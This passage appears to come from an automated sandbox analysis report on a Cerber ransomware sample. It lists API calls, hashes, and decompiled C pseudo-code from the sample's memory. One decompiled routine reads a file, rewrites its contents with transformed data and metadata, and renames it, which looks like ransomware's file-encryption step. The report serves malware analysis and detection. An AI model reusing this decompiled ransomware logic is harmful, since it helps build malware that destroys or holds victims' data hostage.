                                                                                                                                                                                        • GetStockObject.GDI32(00000002), ref: 0040888C
                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 00408898
                                                                                                                                                                                        • SetPixel.GDI32(00000000,00000000,00000000,?), ref: 004088FA
                                                                                                                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000411), ref: 00408926
                                                                                                                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000011), ref: 0040894F
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00408970
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408979
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00408983
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040898C
                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00408996
                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0040899E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$Select$CapsCreateDeleteDeviceText$ColorCompatibleDraw$BitmapFillFontPixelRectReleaseStocklstrcmpilstrlen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3678731151-0
                                                                                                                                                                                        • Opcode ID: d76828802d53ad9390a58e71894fa75d68f2871c06736e27ec4a87b76ab4e022
                                                                                                                                                                                        • Instruction ID: ef1943a7f34fee3139141099a9e207c1e29f1f4870d14a52305c2a9e29fd8a02
                                                                                                                                                                                        • Opcode Fuzzy Hash: d76828802d53ad9390a58e71894fa75d68f2871c06736e27ec4a87b76ab4e022
                                                                                                                                                                                        • Instruction Fuzzy Hash: 738182B1D00218BFDB11AFA5DD459AE7BB8EF48715F01403AF905F72D1DA3849058B6A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                        			E00401A5B(void* __eax, long __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, void* _a16, intOrPtr _a20) {
                                                                                                                                                                                        				signed char _v9;
                                                                                                                                                                                        				char _v10;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                        				signed int* _v28;
                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                        				struct _OVERLAPPED* _v40;
                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                        				long _v48;
                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                        				long _v60;
                                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                        				signed short _v72;
                                                                                                                                                                                        				struct _FILETIME _v80;
                                                                                                                                                                                        				struct _FILETIME _v88;
                                                                                                                                                                                        				struct _FILETIME _v96;
                                                                                                                                                                                        				signed int _v100;
                                                                                                                                                                                        				char _v126;
                                                                                                                                                                                        				char _v128;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                        				intOrPtr _t160;
                                                                                                                                                                                        				struct _OVERLAPPED** _t161;
                                                                                                                                                                                        				long _t169;
                                                                                                                                                                                        				short _t173;
                                                                                                                                                                                        				long _t191;
                                                                                                                                                                                        				void* _t193;
                                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                        				void* _t225;
                                                                                                                                                                                        				void* _t226;
                                                                                                                                                                                        				void* _t228;
                                                                                                                                                                                        				signed short _t229;
                                                                                                                                                                                        				intOrPtr* _t238;
                                                                                                                                                                                        				long _t242;
                                                                                                                                                                                        				long _t243;
                                                                                                                                                                                        				long _t247;
                                                                                                                                                                                        				signed short _t251;
                                                                                                                                                                                        				void* _t254;
                                                                                                                                                                                        				void* _t256;
                                                                                                                                                                                        				struct _OVERLAPPED* _t259;
                                                                                                                                                                                        				void* _t265;
                                                                                                                                                                                        				void* _t268;
                                                                                                                                                                                        				void* _t276;
                                                                                                                                                                                        				void* _t277;
                                                                                                                                                                                        				void* _t281;
                                                                                                                                                                                        				void* _t283;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t243 = __edx;
                                                                                                                                                                                        				_t259 = 0;
                                                                                                                                                                                        				_t225 = __eax;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v10 = 0;
                                                                                                                                                                                        				_t141 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                        				_v20 = _t141;
                                                                                                                                                                                        				if(_t141 == 0xffffffff) {
                                                                                                                                                                                        					L31:
                                                                                                                                                                                        					return _v10;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t227 =  &_v72;
                                                                                                                                                                                        				 *0x40f214(_t141,  &_v72);
                                                                                                                                                                                        				_t276 = _v68 -  *0x42f7ac; // 0x0
                                                                                                                                                                                        				if(_t276 < 0) {
                                                                                                                                                                                        					L27:
                                                                                                                                                                                        					CloseHandle(_v20);
                                                                                                                                                                                        					if(_v16 != _t259) {
                                                                                                                                                                                        						if(_v10 != 0) {
                                                                                                                                                                                        							_v10 = MoveFileW(_a4, _v16) != 0;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_v16);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L31;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t276 > 0) {
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					_push(8);
                                                                                                                                                                                        					_v28 = E004053BD(_t227);
                                                                                                                                                                                        					_v128 = 0;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosw");
                                                                                                                                                                                        					E00405D99(_t227, _t243,  &_v128, 0xb, 0xf);
                                                                                                                                                                                        					_push("955c");
                                                                                                                                                                                        					_push( &_v128);
                                                                                                                                                                                        					_push(_a8);
                                                                                                                                                                                        					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
                                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                                        					E00405B0C(_t225, _t227,  &_v126, _t259, _t277);
                                                                                                                                                                                        					_t268 = _t265 + 0x2c;
                                                                                                                                                                                        					_t156 = E00404EA5(_v16);
                                                                                                                                                                                        					_pop(_t228);
                                                                                                                                                                                        					_t278 = _t156;
                                                                                                                                                                                        					if(_t156 == 0) {
                                                                                                                                                                                        						L7:
                                                                                                                                                                                        						_t229 = _v72;
                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                        						_v64 =  *0x42f7b4 & 0x0000ffff;
                                                                                                                                                                                        						_v60 = _t243;
                                                                                                                                                                                        						_v96.dwLowDateTime = _t229 - 0x42f7c0->LowPart;
                                                                                                                                                                                        						_t160 = _v68;
                                                                                                                                                                                        						asm("sbb edx, [0x42f7c4]");
                                                                                                                                                                                        						_v9 = 0;
                                                                                                                                                                                        						_v24 = _t259;
                                                                                                                                                                                        						_t281 = _t160 - _v60;
                                                                                                                                                                                        						if(_t281 < 0 || _t281 <= 0 && _v96.dwLowDateTime <= _v64) {
                                                                                                                                                                                        							_t251 = _t229 & 0x0000ffff;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t247 =  *0x42f7b8; // 0x4000000
                                                                                                                                                                                        							asm("sbb eax, [ebp-0x38]");
                                                                                                                                                                                        							_t242 = _t229 - _v64 - 0x42f7c0->LowPart;
                                                                                                                                                                                        							_t251 =  *0x42f7b4 & 0x0000ffff;
                                                                                                                                                                                        							asm("sbb eax, [0x42f7c4]");
                                                                                                                                                                                        							_v24 = _t247;
                                                                                                                                                                                        							_t283 = _t160 - _t259;
                                                                                                                                                                                        							if(_t283 <= 0 && (_t283 < 0 || _t242 < _t247)) {
                                                                                                                                                                                        								_v24 = _t242;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_v9 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t161 = _v28;
                                                                                                                                                                                        						if(_t161 != _t259 || _v9 == 0) {
                                                                                                                                                                                        							if(_v9 != 0) {
                                                                                                                                                                                        								 *_t161 = _t259;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							GetFileTime(_v20,  &_v80,  &_v88,  &_v96);
                                                                                                                                                                                        							_push(_t259);
                                                                                                                                                                                        							_v36 = ( *0x42f7a4 & 0x0000ffff) + _t225 + 0x17;
                                                                                                                                                                                        							SetFilePointerEx(_v20, 0x42f7c0->LowPart,  *0x42f7c4, _t259);
                                                                                                                                                                                        							_t169 = _t251 & 0x0000ffff;
                                                                                                                                                                                        							_v32 = _t169;
                                                                                                                                                                                        							ReadFile(_v20, _v36, _t169,  &_v60, _t259);
                                                                                                                                                                                        							 *((char*)(_t225 + 8)) = _v9;
                                                                                                                                                                                        							 *((intOrPtr*)(_t225 + 9)) = _v24;
                                                                                                                                                                                        							_t173 = 0x42f7c0->LowPart; // 0x708
                                                                                                                                                                                        							 *((short*)(_t225 + 0xf)) = _t173;
                                                                                                                                                                                        							 *(_t225 + 6) = lstrlenW(_a12) + _t174;
                                                                                                                                                                                        							 *(_t225 + 0xd) = _t251;
                                                                                                                                                                                        							 *((intOrPtr*)(_t225 + 0x11)) = E0040AF39( &_v60, _v32);
                                                                                                                                                                                        							_v36 = _t225 + 0x17;
                                                                                                                                                                                        							E00404B6E(_t225 + 0x17,  *0x42f7a4 & 0x0000ffff);
                                                                                                                                                                                        							_t233 =  *(_t225 + 6) & 0x0000ffff;
                                                                                                                                                                                        							_v44 = ( *(_t225 + 6) & 0x0000ffff) + 0x18 + (_v9 & 0x000000ff) * 8;
                                                                                                                                                                                        							_t254 = E004053BD( *(_t225 + 6) & 0x0000ffff);
                                                                                                                                                                                        							_v52 = _t254;
                                                                                                                                                                                        							_t288 = _t254 - _t259;
                                                                                                                                                                                        							if(_t254 != _t259) {
                                                                                                                                                                                        								 *((intOrPtr*)(_t254 + 4)) = _v80.dwHighDateTime;
                                                                                                                                                                                        								 *_t254 = _v80.dwLowDateTime;
                                                                                                                                                                                        								 *((intOrPtr*)(_t254 + 0xc)) = _v88.dwHighDateTime;
                                                                                                                                                                                        								 *(_t254 + 8) = _v88.dwLowDateTime;
                                                                                                                                                                                        								 *((intOrPtr*)(_t254 + 0x14)) = _v96.dwHighDateTime;
                                                                                                                                                                                        								 *(_t254 + 0x10) = _v96.dwLowDateTime;
                                                                                                                                                                                        								_t88 = _t254 + 0x18; // 0x18
                                                                                                                                                                                        								memcpy(_t88, _a12,  *(_t225 + 6) & 0x0000ffff);
                                                                                                                                                                                        								_t191 =  *0x42f794; // 0x63
                                                                                                                                                                                        								_v48 = _t191;
                                                                                                                                                                                        								_t193 = E0040B283(_t233, _t288,  *0x42f7bc, _t225,  &_v48);
                                                                                                                                                                                        								_v56 = _t193;
                                                                                                                                                                                        								if(_t193 != _t259) {
                                                                                                                                                                                        									_v100 = _v100 & 0x00000000;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									asm("adc eax, edx");
                                                                                                                                                                                        									asm("adc eax, [0x42f7c4]");
                                                                                                                                                                                        									if(E0040194B(_v20, _v36, _v24, _a20, _v28,  *_v28 * _v24 + _v32 + 0x42f7c0->LowPart, _v100) != 0) {
                                                                                                                                                                                        										_t200 =  *(_t225 + 6) & 0x0000ffff;
                                                                                                                                                                                        										_t238 = _v28;
                                                                                                                                                                                        										 *((intOrPtr*)(_t254 + 0x18 + _t200)) =  *_t238;
                                                                                                                                                                                        										 *((intOrPtr*)(_t200 + _t254 + 0x1c)) =  *((intOrPtr*)(_t238 + 4));
                                                                                                                                                                                        										E0040AFFE( *0x42f7a4 & 0x0000ffff, _v44, _v36, _t254, _t259);
                                                                                                                                                                                        										_t226 = _v20;
                                                                                                                                                                                        										_push(_t259);
                                                                                                                                                                                        										SetFilePointerEx(_t226,  *0x42f7c0,  *0x42f7c4, _t259);
                                                                                                                                                                                        										_t256 = _a16;
                                                                                                                                                                                        										E00404B6E(_t256, _v32);
                                                                                                                                                                                        										WriteFile(_t226, _t256, _v32,  &_v24, _t259);
                                                                                                                                                                                        										_push(2);
                                                                                                                                                                                        										_v40 = _t259;
                                                                                                                                                                                        										asm("stosd");
                                                                                                                                                                                        										_t120 =  &_v40; // 0x40237c
                                                                                                                                                                                        										SetFilePointerEx(_t226,  *_t120, _v36, _t259);
                                                                                                                                                                                        										WriteFile(_t226, _v52, _v44,  &_v24, _t259);
                                                                                                                                                                                        										WriteFile(_t226, _v56, _v48,  &_v24, _t259);
                                                                                                                                                                                        										WriteFile(_t226,  *0x42f7b0,  *0x42f7a0,  &_v24, _t259);
                                                                                                                                                                                        										_t254 = _v52;
                                                                                                                                                                                        										_v10 = 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									E00405463(_v56);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								E00405463(_t254);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_v28);
                                                                                                                                                                                        						_t259 = 0;
                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					E00405463(_v16);
                                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
                                                                                                                                                                                        					_v128 = 0;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosw");
                                                                                                                                                                                        					E00405D99(_t228, _t243,  &_v128, 0xb, 0xf);
                                                                                                                                                                                        					_push("955c");
                                                                                                                                                                                        					_push( &_v128);
                                                                                                                                                                                        					_push(_a8);
                                                                                                                                                                                        					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
                                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                                        					E00405B0C(_t225, _t228,  &_v126, _v16, _t278);
                                                                                                                                                                                        					_t268 = _t268 + 0x2c;
                                                                                                                                                                                        					_t223 = E00404EA5(_v16);
                                                                                                                                                                                        					_pop(_t228);
                                                                                                                                                                                        					if(_t223 != 0) {
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t259 = 0;
                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t277 = _v72 -  *0x42f7a8; // 0x800
                                                                                                                                                                                        				if(_t277 < 0) {
                                                                                                                                                                                        					goto L27;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x00401b20
                                                                                                                                                                                        0x00401b8a
                                                                                                                                                                                        0x00401b91
                                                                                                                                                                                        0x00401b94
                                                                                                                                                                                        0x00401b95
                                                                                                                                                                                        0x00401ba0
                                                                                                                                                                                        0x00401ba3
                                                                                                                                                                                        0x00401ba6
                                                                                                                                                                                        0x00401bab
                                                                                                                                                                                        0x00401bb1
                                                                                                                                                                                        0x00401bb5
                                                                                                                                                                                        0x00401bb8
                                                                                                                                                                                        0x00401bbb
                                                                                                                                                                                        0x00401bfc
                                                                                                                                                                                        0x00401bc7
                                                                                                                                                                                        0x00401bca
                                                                                                                                                                                        0x00401bd0
                                                                                                                                                                                        0x00401bd3
                                                                                                                                                                                        0x00401bd9
                                                                                                                                                                                        0x00401be0
                                                                                                                                                                                        0x00401be6
                                                                                                                                                                                        0x00401be9
                                                                                                                                                                                        0x00401beb
                                                                                                                                                                                        0x00401bf3
                                                                                                                                                                                        0x00401bf3
                                                                                                                                                                                        0x00401bf6
                                                                                                                                                                                        0x00401bf6
                                                                                                                                                                                        0x00401bff
                                                                                                                                                                                        0x00401c04
                                                                                                                                                                                        0x00401c14
                                                                                                                                                                                        0x00401c16
                                                                                                                                                                                        0x00401c16
                                                                                                                                                                                        0x00401c27
                                                                                                                                                                                        0x00401c34
                                                                                                                                                                                        0x00401c46
                                                                                                                                                                                        0x00401c4c
                                                                                                                                                                                        0x00401c53
                                                                                                                                                                                        0x00401c5e
                                                                                                                                                                                        0x00401c64
                                                                                                                                                                                        0x00401c70
                                                                                                                                                                                        0x00401c76
                                                                                                                                                                                        0x00401c79
                                                                                                                                                                                        0x00401c7f
                                                                                                                                                                                        0x00401c91
                                                                                                                                                                                        0x00401c95
                                                                                                                                                                                        0x00401c9e
                                                                                                                                                                                        0x00401cad
                                                                                                                                                                                        0x00401cb0
                                                                                                                                                                                        0x00401cba
                                                                                                                                                                                        0x00401cc2
                                                                                                                                                                                        0x00401cca
                                                                                                                                                                                        0x00401ccc
                                                                                                                                                                                        0x00401ccf
                                                                                                                                                                                        0x00401cd1
                                                                                                                                                                                        0x00401cda
                                                                                                                                                                                        0x00401ce0
                                                                                                                                                                                        0x00401ce5
                                                                                                                                                                                        0x00401ceb
                                                                                                                                                                                        0x00401cf1
                                                                                                                                                                                        0x00401cf7
                                                                                                                                                                                        0x00401d02
                                                                                                                                                                                        0x00401d06
                                                                                                                                                                                        0x00401d0b
                                                                                                                                                                                        0x00401d13
                                                                                                                                                                                        0x00401d21
                                                                                                                                                                                        0x00401d29
                                                                                                                                                                                        0x00401d2e
                                                                                                                                                                                        0x00401d40
                                                                                                                                                                                        0x00401d44
                                                                                                                                                                                        0x00401d4a
                                                                                                                                                                                        0x00401d52
                                                                                                                                                                                        0x00401d73
                                                                                                                                                                                        0x00401d79
                                                                                                                                                                                        0x00401d7d
                                                                                                                                                                                        0x00401d82
                                                                                                                                                                                        0x00401d8a
                                                                                                                                                                                        0x00401d9c
                                                                                                                                                                                        0x00401da1
                                                                                                                                                                                        0x00401da7
                                                                                                                                                                                        0x00401db6
                                                                                                                                                                                        0x00401dbf
                                                                                                                                                                                        0x00401dc2
                                                                                                                                                                                        0x00401dd2
                                                                                                                                                                                        0x00401dd8
                                                                                                                                                                                        0x00401ddd
                                                                                                                                                                                        0x00401de3
                                                                                                                                                                                        0x00401de7
                                                                                                                                                                                        0x00401deb
                                                                                                                                                                                        0x00401dfd
                                                                                                                                                                                        0x00401e0f
                                                                                                                                                                                        0x00401e27
                                                                                                                                                                                        0x00401e2d
                                                                                                                                                                                        0x00401e30
                                                                                                                                                                                        0x00401e30
                                                                                                                                                                                        0x00401e37
                                                                                                                                                                                        0x00401e37
                                                                                                                                                                                        0x00401e3e
                                                                                                                                                                                        0x00401e3e
                                                                                                                                                                                        0x00401cd1
                                                                                                                                                                                        0x00401e46
                                                                                                                                                                                        0x00401e4b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00401b22
                                                                                                                                                                                        0x00401b25
                                                                                                                                                                                        0x00401b2c
                                                                                                                                                                                        0x00401b30
                                                                                                                                                                                        0x00401b37
                                                                                                                                                                                        0x00401b38
                                                                                                                                                                                        0x00401b39
                                                                                                                                                                                        0x00401b3a
                                                                                                                                                                                        0x00401b3b
                                                                                                                                                                                        0x00401b3e
                                                                                                                                                                                        0x00401b46
                                                                                                                                                                                        0x00401b4e
                                                                                                                                                                                        0x00401b56
                                                                                                                                                                                        0x00401b57
                                                                                                                                                                                        0x00401b6e
                                                                                                                                                                                        0x00401b72
                                                                                                                                                                                        0x00401b73
                                                                                                                                                                                        0x00401b78
                                                                                                                                                                                        0x00401b7e
                                                                                                                                                                                        0x00401b83
                                                                                                                                                                                        0x00401b86
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00401b88
                                                                                                                                                                                        0x00401b88
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00401b88
                                                                                                                                                                                        0x00401b86
                                                                                                                                                                                        0x00401ab1
                                                                                                                                                                                        0x00401ab7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00401A80
                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401A97
                                                                                                                                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 00401C27
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401C4C
                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401C64
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00401C83
                                                                                                                                                                                        • memcpy.NTDLL(00000018,?,?), ref: 00401D06
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401DB6
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DD2
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,|#@,?,00000000,00000002), ref: 00401DEB
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DFD
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401E0F
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000), ref: 00401E27
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401E50
                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00401E67
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Write$Pointer$CloseCreateHandleMoveReadSizeTimelstrlenmemcpy
                                                                                                                                                                                        • String ID: 955c$|#@
                                                                                                                                                                                        • API String ID: 2810646288-890247653
                                                                                                                                                                                        • Opcode ID: a55abf723c6de856641295b72b9cf681b56941c3cd29c50f46336b521459b712
                                                                                                                                                                                        • Instruction ID: 03c0d9b36c0c9c4c583867d549d6c9e758735e5455f2e97db342a84e4f9e9e08
                                                                                                                                                                                        • Opcode Fuzzy Hash: a55abf723c6de856641295b72b9cf681b56941c3cd29c50f46336b521459b712
                                                                                                                                                                                        • Instruction Fuzzy Hash: 04D13776D00118AFCB11DFA4DD45AAEBBB9FF48700F50407AF900B72A1D735A955CBA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                        			E00402438(char __ebx, void* __edx, char _a4) {
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                        				char _t38;
                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				long _t50;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                        				_t38 = __ebx;
                                                                                                                                                                                        				_t39 = 7;
                                                                                                                                                                                        				_t45 =  &_v36;
                                                                                                                                                                                        				memset(_t45, 0, _t39 << 2);
                                                                                                                                                                                        				_t54 = _t53 + 0xc;
                                                                                                                                                                                        				_t46 = _t45 + _t39;
                                                                                                                                                                                        				_t3 =  &_a4; // 0x40666c
                                                                                                                                                                                        				_v40 = __ebx;
                                                                                                                                                                                        				_v12 =  *_t3;
                                                                                                                                                                                        				_t14 = E00402C54(_t44, __ebx);
                                                                                                                                                                                        				_pop(_t41);
                                                                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                                                                        					E00404CDC();
                                                                                                                                                                                        					_a4 = GetTickCount();
                                                                                                                                                                                        					_push(E0040591C(0x40d134, 0x14, 0xa9527bfc));
                                                                                                                                                                                        					_push(__ebx);
                                                                                                                                                                                        					E00402C20(__ebx, _t44, _t46, _t48);
                                                                                                                                                                                        					_t54 = _t54 + 0x14;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t49 = E0040622D(_t38, _t41);
                                                                                                                                                                                        				 *0x40f1d8( &_v36);
                                                                                                                                                                                        				_t19 = 1;
                                                                                                                                                                                        				if( *0x42f79c != 0) {
                                                                                                                                                                                        					_t19 = E00405FF0() *  *0x42f798;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t19 != 0) {
                                                                                                                                                                                        					_t47 = _t19;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						E00406309(_t49, _t41, _t52, E00401EB2,  &_v40);
                                                                                                                                                                                        						_t47 = _t47 - 1;
                                                                                                                                                                                        						_pop(_t41);
                                                                                                                                                                                        					} while (_t47 != 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E0040630E(_t49);
                                                                                                                                                                                        				E0040634B(_t49, _t38);
                                                                                                                                                                                        				_t50 = GetTickCount();
                                                                                                                                                                                        				if(E00402C54(_t44, _t38) != 0) {
                                                                                                                                                                                        					_t9 =  &_a4; // 0x40666c
                                                                                                                                                                                        					_t51 = _t50 -  *_t9;
                                                                                                                                                                                        					_push(_t50 -  *_t9);
                                                                                                                                                                                        					_push(E0040591C( &E0040D14C, 0x20, 0x4e29eca8));
                                                                                                                                                                                        					_push(_t38);
                                                                                                                                                                                        					E00402C20(_t38, _t44, _t46, _t51);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return  *0x40f1e0( &_v36);
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00402463
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 00402492
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004024D9
                                                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 00402512
                                                                                                                                                                                          • Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000), ref: 00404CE8
                                                                                                                                                                                          • Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
                                                                                                                                                                                          • Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CountCriticalSectionTick$AttributesCreateDeleteDirectoryFileInitializePathRootSkip
                                                                                                                                                                                        • String ID: 0jt$lf@
                                                                                                                                                                                        • API String ID: 892241556-2925110192
                                                                                                                                                                                        • Opcode ID: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
                                                                                                                                                                                        • Instruction ID: 166ea61db472a150428fbf2cef9c788feb35943bfc0e1425f8dccfb6179776be
